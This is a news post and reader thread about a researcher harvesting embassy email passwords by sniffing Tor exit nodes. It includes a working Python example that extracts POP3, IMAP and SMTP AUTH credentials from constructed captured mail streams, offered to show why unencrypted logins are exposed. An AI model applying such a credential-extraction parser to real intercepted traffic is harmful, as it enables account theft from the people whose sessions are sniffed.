Security Privacy

Tor Used To Collect Embassy Email Passwords

Several readers wrote in to inform us that Swedish security researcher Dan Egerstad has revealed how he collected 100 passwords from embassies and governments worldwide without hacking into anything: he sniffed traffic at Tor exit nodes. Tor encrypts traffic only between the client and the exit; whatever leaves the exit is exactly what the client sent, so a mail login that is not itself wrapped in TLS is readable by whoever runs that exit. Both Ars and heise have writeups on Egerstad's blog post, but neither adds much to the original. It's not news that unencrypted traffic exits the Tor network unencrypted, but Egerstad correctly perceived, and called attention to, the lack of appreciation for this fact in organizations worldwide.
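To make concrete what an exit operator in Egerstad's position actually gets, here is an added example written for this page; it is not Egerstad's code and not anything from the Tor project. It takes the client-to-server bytes an exit would reassemble for a few mail sessions and pulls out a POP3 USER/PASS pair, an IMAP LOGIN, and SMTP AUTH PLAIN and AUTH LOGIN. The server names and sessions are constructed, and the parsers stop at STLS/STARTTLS on the assumption that the server accepted it, which is the one case where the exit learns nothing.

```python
# Added example for this page, not Egerstad's code or anything from the Tor
# project: what an exit node sees.  Tor hands the exit the client's TCP payload
# exactly as sent, so a mail login not wrapped in TLS is readable by protocol
# parsing alone.  Captures and server names below are constructed.
import base64
import re
from collections import namedtuple

Credential = namedtuple("Credential", "protocol server username password")

CAPTURES = {  # client->server payload per (server, port), as an exit would reassemble it
    ("mail.example-embassy.test", 110): b"USER attache\r\nPASS hunter2\r\nSTAT\r\nQUIT\r\n",
    ("imap.example-ministry.test", 143): b'a001 LOGIN "consul" "s3cret pass"\r\n',
    ("smtp.example-ministry.test", 25): b"EHLO laptop\r\nAUTH PLAIN "
        + base64.b64encode(b"\0press\0tor-is-not-tls") + b"\r\n",
    ("smtp.example-embassy.test", 587): b"EHLO laptop\r\nAUTH LOGIN\r\n"
        + base64.b64encode(b"diplomat") + b"\r\n" + base64.b64encode(b"Pa55word") + b"\r\n",
    # STLS before the login: everything after it is TLS handshake bytes.
    ("pop.example-careful.test", 110): b"STLS\r\n\x16\x03\x01\x00\xc4\x01\x00\x00\xc0\x03\x03\xaa",
}


def _pop3(lines):
    """POP3 sends USER then PASS in the clear unless STLS came first."""
    user = None
    for line in lines:
        verb, _, arg = line.partition(" ")
        if verb.upper() == "STLS":
            return None  # assume the server accepted; the rest is TLS
        if verb.upper() == "USER":
            user = arg
        elif verb.upper() == "PASS" and user is not None:
            return user, arg
    return None

# IMAP: '<tag> LOGIN <user> <pass>'; either argument may be a quoted string.
_IMAP_LOGIN = re.compile(
    r'^\S+\s+LOGIN\s+("(?:[^"\\]|\\.)*"|\S+)\s+("(?:[^"\\]|\\.)*"|\S+)', re.I)

def _unquote(token):
    if len(token) >= 2 and token[0] == '"' == token[-1]:
        return re.sub(r"\\(.)", r"\1", token[1:-1])
    return token

def _imap(lines):
    for line in lines:
        if re.match(r"^\S+\s+STARTTLS\b", line, re.I):
            return None
        m = _IMAP_LOGIN.match(line)
        if m:
            return _unquote(m.group(1)), _unquote(m.group(2))
    return None

def _b64(token):
    """Decode one SASL base64 token; None if missing or not valid base64."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "replace") if token else None
    except ValueError:
        return None

def _smtp(lines):
    """AUTH PLAIN is authzid\\0authcid\\0password in one blob; AUTH LOGIN is two lines."""
    it = iter(lines)
    for line in it:
        parts = line.split()
        if parts and parts[0].upper() == "STARTTLS":
            return None
        if len(parts) < 2 or parts[0].upper() != "AUTH":
            continue
        mech = parts[1].upper()
        if mech == "PLAIN":
            decoded = _b64(parts[2] if len(parts) > 2 else next(it, ""))
            if decoded is not None and decoded.count("\0") == 2:
                _authzid, authcid, password = decoded.split("\0")
                return authcid, password
        elif mech == "LOGIN":
            user = _b64(parts[2] if len(parts) > 2 else next(it, ""))
            password = _b64(next(it, ""))
            if user is not None and password is not None:
                return user, password
    return None

PARSERS = {110: ("pop3", _pop3), 143: ("imap", _imap), 25: ("smtp", _smtp), 587: ("smtp", _smtp)}

def extract_credentials(captures):
    """Run the parser for each well-known mail port over its client stream."""
    found = []
    for (server, port), payload in captures.items():
        if port not in PARSERS:
            continue
        protocol, parser = PARSERS[port]
        # latin-1 maps every byte value, so the TLS bytes after STLS do not raise
        hit = parser(payload.decode("latin-1").split("\r\n"))
        if hit:
            found.append(Credential(protocol, server, *hit))
    return found

if __name__ == "__main__":
    for c in extract_credentials(CAPTURES):
        print(f"{c.protocol:4} {c.server:28} {c.username}:{c.password}")
```

Run as a script it prints the four plaintext logins and nothing for the STLS session. Note that AUTH PLAIN and AUTH LOGIN are base64, not encryption, which is why the SMTP cases fall out as easily as the bare POP3 one; only a TLS layer around the whole session takes the credentials out of the exit's view.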
  • by Anonymous Coward on Tuesday September 11, 2007 @02:03PM (#20557979)
    Working at an ISP, I know for a fact that the RCMP used to monitor the traffic of several embassies with a server installed at the ISP end.
  • Re:Heh (Score:3, Informative)

    by charlesnw ( 843045 ) <charles@knownelement.com> on Tuesday September 11, 2007 @02:20PM (#20558393) Homepage Journal
    Um. Have you ever used Tor? Did you read the article or even the summary? There is NO MENTION of any vulnerabilities in Tor. You are implying that Tor is backdoored or somehow otherwise vulnerable. This is not the case or what happened here. The information gathering occurred via sniffing of an exit router.
  • and? (Score:3, Informative)

    by tomstdenis ( 446163 ) <tomstdenis@g[ ]l.com ['mai' in gap]> on Tuesday September 11, 2007 @02:44PM (#20558933) Homepage
    I thought it was common knowledge that most exit routes were owned by the very people that people think they need to keep secrets from.

    Personally, I'm more afraid of some script kiddie stealing my ID than the man listening to my thoughts ... but then again I grew up in Canada, not Bosnia or whatever :-)
  • by SCHecklerX ( 229973 ) <greg@gksnetworks.com> on Tuesday September 11, 2007 @02:52PM (#20559109) Homepage
    If you have an account on the box hosting the POP server and can use ssh, then just forward POP over ssh. Otherwise, that sucks; you're screwed.
  • Re:Heh (Score:5, Informative)

    by kebes ( 861706 ) on Tuesday September 11, 2007 @02:59PM (#20559257) Journal
    Indeed. This isn't a problem with TOR per se. If I'm reading the blog post correctly, the security issue he is really identifying is: "don't mix an anonymizer with identifiable actions."

    Quite simply, TOR is a system to anonymize, so that the website you are going to can't tell who you are. (e.g. can't correlate between repeated visits, can't use your IP to track you down, etc.) As long as you are surfing in a non-identifiable way, even the exit node doesn't know anything about you, and can't determine which requests came from you, as opposed to someone else in the TOR network.

    However, if you use TOR in an identifiable way, such as sending a plaintext email (which has plaintext "To" and "From" fields), then you're not using TOR properly. You are inherently exposing yourself, and the exit node can now learn quite a bit about you. If you are connecting to resources without encryption, then the exit node can sniff the data.

    Normally, though, you wouldn't use TOR in combination with a secure site you are logging into, anyway. (What's the point in anonymizing your IP address if you log in with your easily-identifiable username, anyway? The site is obviously going to identify you!) So, really, you should not just turn TOR on and then forget about it, because you shouldn't be sending your email through TOR, nor logging into sites using TOR.

    The lesson to learn from his blog post, which he doesn't state plainly enough, is that you should split your web-usage into categories:
    1. When browsing in a non-identifiable way, use TOR if you want anonymity.
    2. When accessing/logging-in to a trusted resource, don't use TOR. (This includes email, etc.)
    3. If you need to access a specific resource while maintaining anonymity, use TOR but make sure you use strong end-to-end encryption for the entire session (and not merely encryption for the login phase).

    This is, at least, my understanding. Corrections and clarifications are welcome.
  • by Abcd1234 ( 188840 ) on Tuesday September 11, 2007 @03:03PM (#20559311) Homepage
    Or just run openssh with the -D option, which sets up a dynamic proxy that conforms to the SOCKS protocol, and then just point your browser at it.

    Assuming, of course, you had access to openssh.
  • Re:Heh (Score:5, Informative)

    by HTH NE1 ( 675604 ) on Tuesday September 11, 2007 @03:33PM (#20559929)
    You can use it in a personally identifying way if what you want to conceal is not your identity but rather your location, or you have a need to communicate securely at your local end so that others at your end won't know where you're going.

    There's a balance to be struck with anonymity and security and where you strike it depends on what aspects need to be anonymous and what other aspects need to be secure.
  • by Mr. Underbridge ( 666784 ) on Tuesday September 11, 2007 @04:36PM (#20561037)
    Seriously, people. OF COURSE that works! Man in the middle, anyone? Where's the big deal?

    I don't think the guy was billing it as some major technical achievement. The news is the sensitivity of the traffic.
  • by turbidostato ( 878842 ) on Tuesday September 11, 2007 @07:46PM (#20563975)
    "Don't put too much faith in SSL. Yep, even with SSL, someone can play a man in the middle attack on you."

    Just tell me how you expect to launch a MiM attack against a site whose public key I already have on hand. Yeah, well, not a valid case for a US high school where, as is commonplace, students usually reside up to ten thousand miles away from the premises.

    "IPSec is a better choice for remote services."

    Yes sir, especially when you can only make one side agree. Surely forcing an IPSec tunnel on every single student who just wants to download her e-mail from the school server is the proper, measured, well-engineered solution for the problem. Just using POP3S? Naaah!
  • by Anonymous Coward on Tuesday September 11, 2007 @11:50PM (#20566719)
    Working at an ISP, I know for a fact that the RCMP used to monitor the traffic of several embassies with a server installed at the ISP end.

    I doubt it. Decades ago it would have been the RCMP, but today that falls under the domain of the Communications Security Establishment, not the RCMP.

    The CSE is Canada's version of the NSA. Betcha didn't know that! We're like a grown-up country after all!
